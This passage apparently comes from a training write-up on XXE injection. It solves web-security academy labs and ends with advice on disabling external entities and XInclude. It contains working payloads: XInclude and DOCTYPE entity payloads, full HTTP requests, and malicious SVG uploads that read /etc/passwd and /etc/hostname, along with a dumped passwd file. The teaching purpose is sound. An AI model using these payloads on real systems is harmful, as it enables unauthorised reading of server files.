%local_dtd;]><stockCheck> <productId>1</productId> <storeId>1</storeId></stockCheck>
By sending the request using the above XXE payload, we can cause the application to return an error message containing the content of /etc/passwd.
XML parser exited with error: java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:12001:12001::/home/peter:/bin/bash
carlos:x:12002:12002::/home/carlos:/bin/bash
user:x:12000:12000::/home/user:/bin/bash
elmer:x:12099:12099::/home/elmer:/bin/bash
academy:x:10000:10000::/academy:/bin/bash
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin
saned:x:114:122::/var/lib/saned:/usr/sbin/nologin
colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false (No such file or directory)
XXE Injection - Hidden Attack Surface
There are various XML-based applications like Microsoft Excel documents, OpenDocumentFormats (ODF), and Simple Object Access Protocol (SOAP), among others. These applications utilize XML data and parse it, making them susceptible to XXE injection attacks.
In web applications, XXE attacks are often straightforward because XML is commonly used as the primary method of data transfer or is supported by the application, allowing us to perform XXE injections easily.
However, performing XXE attacks on other applications may not be as straightforward. In some cases, we may not have full control over all the XML data we send, especially when an application accepts our data and places it inside a back-end SOAP request for processing. This limits our ability to add the DOCTYPE declaration used in previous XXE attacks.
Nevertheless, there is a potential solution using XInclude. XInclude is a standard XML feature that enables the inclusion and merging of XML documents within other XML documents. With XInclude, we can include specific portions of XML documents, such as elements or entire documents, by utilizing the <xi:include> element.
The advantage of using XInclude is that we can place it anywhere within the XML document, even if we don't have control over the entire document. This allows us to achieve similar objectives as classic XXE attacks. For instance, if we want to view the content of the /etc/passwd file, we can use the following payload.
<foo>: This is the root element of the XML document.
xmlns:xi="http://www.w3.org/2001/XInclude": This declares the XML namespace for XInclude.
An XML namespace is a way to uniquely identify elements and attributes in an XML document. It is a mechanism used to avoid naming conflicts between different XML vocabularies or schemas. Learn more
<xi:include parse="text" href="file:///etc/passwd"/>: This is the XInclude element that specifies the inclusion of an external resource.
parse="text": This attribute specifies that the content of the included file should be treated as text.
href="file:///etc/passwd": This attribute specifies the location of the file to include. In this case, it's the /etc/passwd file, which is a common file on Unix-based systems that contains user account information.
When the XML document containing this payload is processed, the XInclude mechanism will fetch the content of the /etc/passwd file and include it at the location of the <xi:include> element. The content of the file will be treated as text within the XML document.
This lab Check Stock functionality embeds the user's input into a server-side XML document that is subsequently parsed. Exploit the XXE injection attack to retrieve the content of the /etc/passwd file.
Solution
In this lab we didn't see the clear XML for their data transportation method, they have the Stock Check functionality but this time their request is like the following.
POST /product/stock HTTP/2
Host: 0ad900bf033fd95c846196b3004c00a9.web-security-academy.net
Cookie: session=ttsesoKxVU43wCmvMkXhDNRgb43Wf7c6
Content-Length: 21
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/x-www-form-urlencoded
productId=1&storeId=1
As you can observe, they are using the Content-Type application/x-www-form-urlencoded. When we manually change the content type to XML and modify the request body accordingly, they respond with a missing parameter productId error. This indicates that they are not parsing XML data.
However, there is one more technique we can try, which is using XInclude XXE payloads. In case the application is using XML internally, but we cannot control the entire document, we can potentially use XInclude to exfiltrate data.
We can use this payload anywhere in the request where data is processed and displayed as a result. In this case, the productId parameter is processed to display stock information based on the specified product. Therefore, our request with the XInclude payload will look like this:
Request
POST /product/stock HTTP/2
Host: 0ad900bf033fd95c846196b3004c00a9.web-security-academy.net
Cookie: session=ttsesoKxVU43wCmvMkXhDNRgb43Wf7c6
Content-Length: 126
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/x-www-form-urlencoded
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
As you can see we get the content of /etc/passwd using that which means the application is parsing XML data on the backend but we only control some elements from it, not the whole XML Document. By using this technique, we aim to check whether the application is processing and interpreting XML data, even though it might not use XML explicitly for data transportation.
XXE Injections attack using File Uploads
Certain applications provide the functionality for users to upload files, which are subsequently processed on the server side. Within this context, various common file formats either utilize XML or incorporate XML sub-components. Notable examples of XML-based formats include office document formats like DOCX and image formats such as SVG.
To illustrate, consider an application that permits users to upload images, which are subsequently processed or validated on the server. Although the application may anticipate receiving file formats such as PNG or JPEG, it is plausible that the image processing library employed by the application supports SVG images. Given that SVG is an XML-based format, an attacker could potentially exploit this by submitting a malicious SVG image, thereby exposing hidden attack surfaces and exploiting XXE vulnerabilities. For example, an SVG payload would like the following.
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Similarly, the same principle can be applied to office file formats. Attackers have the ability to embed XXE payloads within malicious office files, which can then be uploaded to the server. By doing so, they exploit the XML parsing functionality of the server-side application, potentially leading to XXE vulnerabilities and associated risks.
LAB #9: XXE Injection Attack Using Image File Upload
This lab has the functionality to upload an avatar image file and uses the Apache Batik library to process that image file. Exploit XXE injection attack by uploading a malicious SVG file that exfiltrates the content of the /etc/hostname file.
Solution
This lab is different from the previous ones because it involves a blogging application instead of a shopping application. The blogging application showcases various blog posts on different topics. Users can view each blog post and leave comments at the bottom of the page. Additionally, users can upload an avatar image that will be displayed with their comments. The request for making a comment with an image is structured as follows:
In the above request, you can see that they are using the Content-Type multipart/form-data, which is standard for file upload functionalities. The file upload feature may have its own issues, but in the context of XXE, it becomes significant because if the upload functionality parses XML data, we can upload malicious SVG files that exfiltrate the content of the /etc/hostname file.
The content of the SVG file is as follows:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
As with a normal XXE payload, we use DOCTYPE and create an external entity that contains the content of the /etc/hostname file. When we send this payload as part of the request, the application will process the SVG file, and in doing so, it will resolve the external entity &xxe;, leading to the exfiltration of the /etc/hostname file content.
In the above request, we upload an SVG file that contains our external entities responsible for exfiltrating the content of the /etc/hostname file. When the back-end system parses the uploaded SVG file, it processes the external entity, and as a result, the image generated contains the content of the /etc/hostname file.
Once the file is uploaded, if you open the image in the comments section, you will see that it displays the hostname of the backend server. This indicates that the application is vulnerable to an XXE injection vulnerability, as it allowed the SVG file to be parsed with the external entity, leading to the leakage of sensitive information.
XXE Attacks Via Modified Content-Type
In modern web applications, XML is not commonly used for data transportation purposes anymore. JSON has become the preferred format due to its reliability and simplicity. However, it's still worth investigating if an application accepts XML data, even if they primarily use the Content-Type: application/json header.
You can manually modify the Content-Type header to application/xml and replace the data with XML content to see if the application accepts it. Surprisingly, you may find that some applications still allow XML data.
For instance, if a normal request looks like this:
POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
foo=bar
You might be able to submit the following request with the same result:
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
If the application accepts this XML request, you can proceed to explore and exploit any potential vulnerabilities using the techniques you have learned so far.
Keep in mind that XML is just a data transfer format. Make sure you also test any XML-based functionality for other vulnerabilities like XSS and SQL injection. You may need to encode your payload using XML escape sequences to avoid breaking the syntax, but you may also be able to use this to obfuscate your attack in order to bypass weak defenses.
XXE Protections
XXE vulnerabilities can be effectively mitigated by disabling the XML features that are commonly exploited by attackers. Most XXE vulnerabilities occur because the application's XML parsing library supports dangerous XML features that are not required or intended for use in the application. By disabling these features, the risk of XXE attacks can be greatly reduced.
The two main features that should be disabled to prevent XXE attacks are the resolution of external entities and the support for XInclude. These features can often be disabled through configuration options or by programmatically overriding the default behavior of the XML parsing library. It is important to consult the documentation specific to your XML parsing library or API to understand how to disable these unnecessary capabilities effectively.
By disabling the resolution of external entities and XInclude support, you can significantly enhance the security of your application against XXE attacks. Implementing these protections should be a standard practice when working with XML parsing libraries or APIs to safeguard your application and its data.